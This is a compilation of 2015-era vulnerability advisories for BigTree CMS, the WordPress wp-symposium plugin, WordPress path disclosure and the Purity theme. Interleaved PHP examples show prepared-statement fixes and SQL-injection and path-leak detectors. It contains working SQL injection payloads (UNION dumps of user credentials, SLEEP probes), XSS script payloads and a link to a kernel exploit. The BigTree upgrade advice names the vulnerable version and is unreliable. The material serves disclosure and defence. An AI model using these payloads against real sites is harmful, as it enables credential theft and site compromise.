BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
Online-Reference:
http://blog.curesec.com/article/blog/BigTree-CMS-423-Multiple-SQL-Injection-Vulnerabilities-39.html
1. Introduction
Affected Product: BigTree CMS 4.2.3
Fixed in: 4.2.4
Fixed Version Link:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Vendor Contact: contribute@bigtreecms.org
Vulnerability Type: Multiple SQL Injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH
2. Vulnerability Description
Various components of the admin area of the BigTree CMS are vulnerable
to SQL injection, which can lead to data leaks as well as compromise of
the host.
Please note that you have to be authenticated to exploit this issue.
SQL Injection 1
The script that processes page view requests passes the "id" GET request
value to functions which put this value directly into SQL queries. No
prepared statements or escaping is used, thus opening it up to SQL
injection.
Proof of Concept (Show all BigTree users):
http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from bigtree_users %23/
Code:
core/admin/modules/pages/view-tree.php:151; page id is user controlled
$nav_visible = array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
$nav_hidden = array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
$nav_archived = $admin->getArchivedNavigationByParent($page["id"]);
core/inc/bigtree/admin.php:2638
static function getArchivedNavigationByParent($parent) {
[...]
    $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY nav_title asc");
core/inc/bigtree/admin.php:3167
static function getHiddenNavigationByParent($parent) {
[...]
    $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived != 'on' ORDER BY nav_title asc");
core/inc/bigtree/admin.php:3758
static function getNaturalNavigationByParent($parent,$levels = 1) {
[...]
    $q = sqlquery("SELECT id,nav_title AS title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND archived != 'on' ORDER BY position DESC, id ASC");
core/inc/bigtree/admin.php:4531
static function getPendingNavigationByParent($parent,$in_nav = true) {
[...]
    $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type = 'NEW' ORDER BY date DESC");
SQL Injection 2
When creating a new user, the email address is not checked server-side,
so it can be set to any string.
When logging in, the email address is saved in the session, and later
used to retrieve user data. This happens without prepared statements,
thus opening the query up to SQL injection.
Proof of Concept:
1. Create User
f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
2. Log in
3. result can be seen in multiple places
Code:
core/inc/bigtree/admin.php:81
$f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id = '".$_SESSION["bigtree_admin"]["id"]."' AND email = '".$_SESSION["bigtree_admin"]["email"]."'"));
SQL Injection 3 (Blind)
The function used to calculate the SEO score of a post for Ajax requests
passes unsanitized user input to a function performing the actual
computation. This function does not use prepared statements, thus
opening it up to SQL injection. The result of the query is never echoed
to the end user, making this a blind SQL injection.
Proof of Concept:
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of All Sizes
http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of All Sizes
Code:
core/admin/ajax/pages/get-seo-score.php:4:
$seo = $admin->getPageSEORating($_POST,$_POST["resources"]);
core/inc/bigtree/admin.php:4222
static function getPageSEORating($page,$content) {
[...]
if ($page["title"]) {
$score += 5;
// They have a title, let's see if it's unique
        $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));
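The three injection points above share one root cause: SQL text is assembled by string concatenation from request or session values, and in the third case escaping was applied to one value but not the other. The block below is an added example, not BigTree's code and not the project's own fix; it rewrites the same three lookups with PDO prepared statements plus input validation, against an in-memory SQLite database so it runs offline. Table and column names follow the advisory; the rows, the helper names (intParam, createUser, currentUser, titleIsUnique) and the demo values are constructed, and the pdo_sqlite extension is assumed to be available.

```php
<?php
// Added example, not BigTree code: the three injection points above rewritten
// with PDO prepared statements and input validation. Schema names follow the
// advisory; rows and helper names are constructed for the demo.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec("CREATE TABLE bigtree_pages (id INTEGER PRIMARY KEY, parent INTEGER, title TEXT, nav_title TEXT, archived TEXT)");
$pdo->exec("CREATE TABLE bigtree_users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)");
$pdo->exec("INSERT INTO bigtree_pages VALUES (1, 0, 'Home', 'Home', ''), (2, 1, 'About', 'About', 'on'), (3, 1, 'News', 'News', '')");
$pdo->exec("INSERT INTO bigtree_users VALUES (1, 'admin@example.com', '<hash>')");

// Ids are integers everywhere in the schema, so reject anything else before it reaches SQL.
function intParam($raw): int {
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($n === false) {
        throw new InvalidArgumentException('expected a non-negative integer id');
    }
    return $n;
}

// SQL Injection 1: the navigation lookup with the parent id bound instead of interpolated.
function getArchivedNavigationByParent(PDO $pdo, $parent): array {
    $stmt = $pdo->prepare("SELECT id, nav_title AS title, parent FROM bigtree_pages
                           WHERE parent = :parent AND archived = 'on' ORDER BY nav_title ASC");
    $stmt->execute([':parent' => intParam($parent)]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// SQL Injection 2: check the address server-side when the account is created ...
function createUser(PDO $pdo, string $email, string $passwordHash): int {
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('not a valid email address');
    }
    $stmt = $pdo->prepare("INSERT INTO bigtree_users (email, password) VALUES (:email, :password)");
    $stmt->execute([':email' => $email, ':password' => $passwordHash]);
    return (int) $pdo->lastInsertId();
}

// ... and treat what comes back out of the session as data, never as SQL text.
function currentUser(PDO $pdo, array $session): ?array {
    $stmt = $pdo->prepare("SELECT id, email FROM bigtree_users WHERE id = :id AND email = :email");
    $stmt->execute([':id' => intParam($session['id'] ?? null), ':email' => (string) ($session['email'] ?? '')]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// SQL Injection 3: the original escaped title but not id. Binding every value
// removes the per-value decision that was missed.
function titleIsUnique(PDO $pdo, array $page): bool {
    $stmt = $pdo->prepare("SELECT COUNT(*) FROM bigtree_pages WHERE title = :title AND id != :id");
    $stmt->execute([':title' => (string) ($page['title'] ?? ''), ':id' => intParam($page['id'] ?? null)]);
    return (int) $stmt->fetchColumn() === 0;
}

// Demo: well-formed input works; the shapes from the proofs of concept are refused before any query runs.
printf("archived children of page 1: %d\n", count(getArchivedNavigationByParent($pdo, '1')));   // 1
printf("title unique for page 3: %s\n", titleIsUnique($pdo, ['id' => '3', 'title' => 'Trees of All Sizes']) ? 'yes' : 'no');
$user = currentUser($pdo, ['id' => '1', 'email' => 'admin@example.com']);
printf("session lookup: %s\n", $user ? $user['email'] : 'none');
foreach (["0' union all select 1,2,3 %23", "foo' or 1=1#"] as $bad) {
    try {
        getArchivedNavigationByParent($pdo, $bad);
    } catch (InvalidArgumentException $e) {
        echo "rejected id: $bad\n";
    }
}
try {
    createUser($pdo, "f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10#bar@example.com", '<hash>');
} catch (InvalidArgumentException $e) {
    echo "rejected email\n";
}
```

Two points worth keeping in mind when applying this. FILTER_VALIDATE_EMAIL still accepts quotes, slashes and several other characters in the local part of an address, so the email check is a data-quality rule, not the injection defence; the bound parameter is what makes the session lookup safe regardless of what the stored address contains. And the integer check on ids is defence in depth: it keeps malformed input out of the error log and out of any later code path that might still concatenate, but the prepared statement is the control that closes the bug. The YCommerce and wp-symposium injections further down this page are the same defect with the same fix.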
3. Solution
To mitigate this issue, please upgrade to at least version 4.2.3:
https://github.com/bigtreecms/BigTree-CMS/archive/4.2.3.zip
Please note that a newer version might already be available.
4. Report Timeline
07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor sent fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
Details
================
Software: WP Symposium
Version: 15.1
Homepage: https://wordpress.org/plugins/wp-symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
Vulnerability
================
An unauthenticated user can perform blind SQL injection against the site and extract password hashes and other information from the database.
Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/wordpress/
Content-Length: 51
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
Mitigations
================
Upgrade to version 15.8 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published
Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE:
# Category: remote
1. Product Description
Extract from the plugin page:
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."
2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL injection in the 'size' parameter of get_album_item.php.
The issue is exploitable even if the plugin is deactivated.
3. Impact Analysis
The SQL injection makes it very easy to retrieve the entire database content, which includes user details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator's password is obtained, the attacker could take complete control of the Wordpress installation. Collected information may also enable further attacks.
4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10
5. Proof of Concept
PoC URL: http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix): wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example:
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Asked for a delay to deploy the fix
2015-08-04 : Response: 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)
7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.
8. Personal Notes
I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interested in any discussion/advice/question/criticism about security/exploits/programming :-)
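Both wp-symposium reports above describe the same exposure from the defender's side: a plugin file that is reachable directly under wp-content/plugins, taking a query or form parameter straight into SQL, with the dxw proof of concept relying on a 5-second delay and the second on a statement terminated by a comment. The block below is an added example, not part of either advisory and not the plugin's code: a small triage screen that decodes request parameters from recorded requests (a WAF export or an application-level audit hook that captures both query string and form body) and flags those two shapes, plus direct requests to plugin PHP files, which reach the code whether or not the plugin is active. The records, the rule set and the 4000 ms threshold are constructed for the demo.

```php
<?php
// Added example, not from either wp-symposium advisory: a request-record triage
// screen for the injection shapes shown above. Records and thresholds are constructed.
declare(strict_types=1);

const SQLI_RULES = [
    'time-based'   => '/\b(?:sleep|benchmark|pg_sleep)\s*\(/i',
    'waitfor'      => '/\bwaitfor\s+delay\b/i',
    'union-select' => '/\bunion\b[\s\/*]+(?:all[\s\/*]+)?select\b/i',
    'comment-tail' => '/(?:--|#|\/\*)\s*$/',
    'tautology'    => '/\b(?:or|and)\s+\S+\s*=\s*\S+/i',
];
const DELAY_THRESHOLD_MS = 4000;   // below the 5 s probe, well above normal latency for this endpoint

// Decode application/x-www-form-urlencoded without parse_str's key rewriting.
function decodeParams(string $encoded): array {
    $params = [];
    foreach (explode('&', $encoded) as $pair) {
        if ($pair === '') {
            continue;
        }
        [$key, $value] = array_pad(explode('=', $pair, 2), 2, '');
        $params[urldecode($key)] = urldecode($value);
    }
    return $params;
}

// Returns a list of [parameter, rule] findings for one request record.
function scanRequest(array $req): array {
    $findings = [];
    // Plugin files requested directly bypass WordPress routing and the plugin's active/inactive state.
    if (preg_match('#/wp-content/plugins/[^/]+/.*\.php$#', $req['path'])) {
        $findings[] = ['path', 'direct-plugin-file'];
    }
    $params = decodeParams(($req['query'] ?? '') . '&' . ($req['body'] ?? ''));
    foreach ($params as $name => $value) {
        foreach (SQLI_RULES as $rule => $regex) {
            if (preg_match($regex, $value)) {
                $findings[] = [$name, $rule];
            }
        }
    }
    // A time-based probe whose response took as long as it asked for is the strongest signal.
    if (in_array('time-based', array_column($findings, 1), true)
        && ($req['duration_ms'] ?? 0) >= DELAY_THRESHOLD_MS) {
        $findings[] = ['timing', 'delay-observed'];
    }
    return $findings;
}

// Constructed records: the two proofs of concept above and one ordinary search.
$requests = [
    ['method' => 'POST', 'path' => '/wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php',
     'body' => 'action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0', 'duration_ms' => 5210],
    ['method' => 'GET', 'path' => '/wordpress/wp-content/plugins/wp-symposium/get_album_item.php',
     'query' => 'size=version%28%29%20;%20--', 'duration_ms' => 38],
    ['method' => 'GET', 'path' => '/wordpress/',
     'query' => 's=autumn+leaves&paged=2', 'duration_ms' => 41],
];
foreach ($requests as $req) {
    $findings = scanRequest($req);
    printf("%-4s %-70s %s\n", $req['method'], $req['path'], $findings ? json_encode($findings) : 'clean');
}
```

The first record yields direct-plugin-file, a time-based hit on topic_id and delay-observed; the second yields direct-plugin-file and comment-tail on size; the search is clean. Treat the pattern rules as a triage signal rather than a verdict: free-text fields will occasionally contain "or x=y" or a trailing "#", so the timing correlation and the plugin-path rule are what separate a probe from noise. In the plugin code itself the equivalent fix is the same as for BigTree above: pass integer ids through absint() and build queries with $wpdb->prepare() using %d and %s placeholders instead of concatenating the parameter.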
Source: https://github.com/kpwn/tpwn
tpwn
cve-2015-???? poc ~ os x 10.10.5 kernel local privilege escalation
vulnerability got burned in 10.11
full writeup #eta#son
shout out @ unthreadedjb 4 hax
Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37825.zip
source: https://www.securityfocus.com/bid/55597/info
WordPress is prone to multiple path-disclosure vulnerabilities.
Remote attackers can exploit these issues to obtain sensitive information that may lead to further attacks.
WordPress 3.4.2 is vulnerable; other versions may also be affected.
http://www.example.com/learn/t/wordpress/wp-includes/vars.php
http://www.example.com/learn/t/wordpress/wp-includes/update.php
http://www.example.com/learn/t/wordpress/wp-includes/theme.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/sidebar.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/header.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/footer.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments.php
http://www.example.com/learn/t/wordpress/wp-includes/theme-compat/comments-popup.php
http://www.example.com/learn/t/wordpress/wp-includes/template-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/taxonomy.php
http://www.example.com/learn/t/wordpress/wp-includes/shortcodes.php
http://www.example.com/learn/t/wordpress/wp-includes/script-loader.php
http://www.example.com/learn/t/wordpress/wp-includes/rss.php
http://www.example.com/learn/t/wordpress/wp-includes/rss-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/registration.php
http://www.example.com/learn/t/wordpress/wp-includes/registration-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/post.php
http://www.example.com/learn/t/wordpress/wp-includes/post-template.php
http://www.example.com/learn/t/wordpress/wp-includes/nav-menu-template.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-settings.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-functions.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/ms-default-constants.php
http://www.example.com/learn/t/wordpress/wp-includes/media.php
http://www.example.com/learn/t/wordpress/wp-includes/kses.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/config.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php
http://www.example.com/learn/t/wordpress/wp-includes/general-template.php
http://www.example.com/learn/t/wordpress/wp-includes/functions.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss2-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rss.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-rdf.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom.php
http://www.example.com/learn/t/wordpress/wp-includes/feed-atom-comments.php
http://www.example.com/learn/t/wordpress/wp-includes/default-widgets.php
http://www.example.com/learn/t/wordpress/wp-includes/default-filters.php
http://www.example.com/learn/t/wordpress/wp-includes/comment-template.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-styles.php
http://www.example.com/learn/t/wordpress/wp-includes/class.wp-scripts.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-xmlrpc-server.php
http://www.example.com/learn/t/wordpress/wp-includes/class-wp-http-ixr-client.php
http://www.example.com/learn/t/wordpress/wp-includes/class-snoopy.php
http://www.example.com/learn/t/wordpress/wp-includes/class-feed.php
http://www.example.com/learn/t/wordpress/wp-includes/category-template.php
http://www.example.com/learn/t/wordpress/wp-includes/canonical.php
http://www.example.com/learn/t/wordpress/wp-includes/author-template.php
http://www.example.com/learn/t/wordpress/wp-includes/admin-bar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/onecolumn-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/loop-attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/header.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/attachment.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyten/404.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/tag.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/single.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/sidebar-footer.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/showcase.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/search.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/page.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/index.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/widgets.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/inc/theme-options.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/image.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/functions.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/comments.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/category.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/author.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/archive.php
http://www.example.com/learn/t/wordpress/wp-content/themes/twentyeleven/404.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/hello.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/widget.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/legacy.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/akismet.php
http://www.example.com/learn/t/wordpress/wp-content/plugins/akismet/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/user/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/upgrade-functions.php
http://www.example.com/learn/t/wordpress/wp-admin/options-head.php
http://www.example.com/learn/t/wordpress/wp-admin/network/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/menu-header.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/user.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/upgrade.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/update-core.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/theme-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/template.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/schema.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/plugin-install.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/nav-menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/ms.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/misc.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/menu.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/media.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/file.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/dashboard.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/continents-cities.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-theme-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-terms-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-posts-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugins-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-plugin-install-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-users-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-themes-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-ms-sites-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-media-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-links-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ssh2.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpsockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-ftpext.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-filesystem-direct.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-wp-comments-list-table.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-sockets.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/class-ftp-pure.php
http://www.example.com/learn/t/wordpress/wp-admin/includes/admin.php
http://www.example.com/learn/t/wordpress/wp-admin/admin-functions.php
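Every URL in the list above is a file meant only to be included by another script. Requested on its own, such a file normally dies with a PHP fatal error, and when display_errors is on the error text, including the file's absolute path on the server, is sent to the client. The block below is an added example, not WordPress code: leakedServerPath() recognises PHP's error format in a response body so a site owner can confirm the leak from their own responses, and hardenErrorOutput() holds the two settings that stop it. The function names and the response bodies are constructed.

```php
<?php
// Added example (not WordPress code): detect PHP error output that discloses a
// server path, and the settings that keep such output server-side.
declare(strict_types=1);

// Matches PHP's default error rendering, both the HTML form (html_errors=On)
// and the plain form, and returns the leaked path or null.
function leakedServerPath(string $body): ?string {
    $re = '~\b(?:Fatal error|Parse error|Warning|Notice)\b.*?\bin\s*(?:<b>)?'
        . '(/[^\s<>]+|[A-Za-z]:\\\\[^\s<>]+)(?:</b>)?\s+on line\s*(?:<b>)?\d+~s';
    return preg_match($re, $body, $m) ? $m[1] : null;
}

// The fix: keep errors in the server log, never in the response. The same two
// values belong in php.ini (display_errors=Off, log_errors=On) for the whole host.
function hardenErrorOutput(): void {
    ini_set('display_errors', '0');
    ini_set('log_errors', '1');
    error_reporting(E_ALL);
}
// For include-only files, the guard WordPress plugins and themes conventionally use:
//   if (!defined('ABSPATH')) { exit; }

// Constructed response bodies for a direct request to a theme template.
$responses = [
    'html_errors on'  => "<br />\n<b>Fatal error</b>:  Uncaught Error: Call to undefined function get_header()"
                       . " in <b>/var/www/html/wp-content/themes/twentyten/404.php</b> on line <b>10</b><br />\n",
    'html_errors off' => "PHP Fatal error:  Call to undefined function get_header() in /srv/wp/wp-content/themes/twentyten/404.php on line 10\n",
    'hardened'        => "<!DOCTYPE html><html><body>Not Found</body></html>",
];
foreach ($responses as $label => $body) {
    printf("%-16s %s\n", $label, leakedServerPath($body) ?? 'no path disclosed');
}
```

The first two bodies return the leaked path; the third returns nothing. Turning display_errors off is the control that matters, because the ABSPATH guard only covers files that carry it, and the list above includes core and theme files that a site owner does not edit.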
source: https://www.securityfocus.com/bid/55605/info
Purity theme for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Purity 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/index.php?m=top&s='><script>alert("Hacked_by_MADSEC")</script>
The "contactName", "email", "subject" and "comments" variables are not
properly sanitized before being used.
Exploit:
POST /contact/ HTTP/1.0
Content-Length: 82
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: exploit-masters.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.example.com/wordpress/contact/
contactName=>"'><script>alert("Hacked_by_MADSEC")</script>&email=&subject=&comments=&submitted=
source: https://www.securityfocus.com/bid/55619/info
